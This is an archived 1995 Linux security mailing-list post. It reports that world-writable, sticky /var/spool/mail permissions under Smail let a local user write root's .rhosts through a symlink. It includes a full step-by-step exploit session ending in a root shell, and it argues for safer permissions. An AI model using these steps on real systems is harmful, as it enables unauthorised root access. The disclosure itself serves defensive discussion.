[429] in linux-security and linux-alert archive
/var/spool/mail permissions
daemon@ATHENA.MIT.EDU (owner-linux-security@tarsier.cv.nr)
Thu Oct 26 15:58:27 1995
From: owner-linux-security@tarsier.cv.nrao.edu
To: linux-security@tarsier.cv.nrao.edu
Date: Wed, 25 Oct 1995 00:18:32 +0000 (GMT)
Cc: cs6171@scitsc
Hello,
People on comp. security. unix have suggested giving
/var/spool/mail drwxrwxrwt permissions on linux. On my system I
know that this is a BAD idea, and I told them so.
My system (Slackware 2.0) runs Smail3.1.28.1 since I have not altered the
mail setup since I have installed it. Now if I change /var/spool/mail to
drwxrwxrwt a user can delete his mail file and replace it with a symbolic
link to any file, mail is then written to this file as root (amusingly the
ownership of the actual symbollic link is then changed).
To use the typical example of root's .rhosts:
arny> ls -ld /var/spool/mail
drwxrwxrwt 2 root mail 1024 Oct 24 21:37 /var/spool/mail/
arny> cp /var/spool/mail/arny ~/myoldmailfile
arny> rm /var/spool/mail/arny
arny> ln -s /root/.rhosts /var/spool/mail/arny
arny> echo localhost arny | mail arny
arny> rsh localhost -l root 'sh -i'
bash# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(shadow)
bash#
I have yet posted the above details, but just this evening I
have received mail from five people asking for them.
The thing is I'm not a great linux expert, although I do use it
everyday. For a start I don't know the answers to the following
questions:
a) how many linux systems does this effect?
b) has this problem to some extent been fixed in the
latest distributions of linux?
c) is this problem old news, has it been discussed
before, how many people know about it?
d) should I post the above 'exploit' details to
comp.security.unix, since some people seem to need
little excuse to criticise linux, which in this case
would be unfair? (Having said that if I keep getting
mail I may (almost) have to post it).
Personally I think slackware really does have the right idea with:
drwxrwxr-x 2 root mail 1024 Oct 24 22:44 /var/spool/mail/
and avoids a lot of problems such as race conditions etc. The
only problem for me is that root is effectively trusting group
mail, which IMO is not a very good idea, although plenty of
other operating systems trust root to all sorts.
I don't subscribe to this mailing list, so please cc all replys
to:
cs6171@scitsc.wlv.ac.uk
Alternatively help me out a little here and post to
comp.security.unix instead.
Thanks,
Arny - cs6171@scitsc.wlv.ac.uk
--
<A HREF="http://scitsc.wlv.ac.uk/~cs6171/hack/index.html">unix/net/hack page</A>
<A HREF="http://scitsc.wlv.ac.uk/~cs6171/home.html">Arny's Home Page</A>
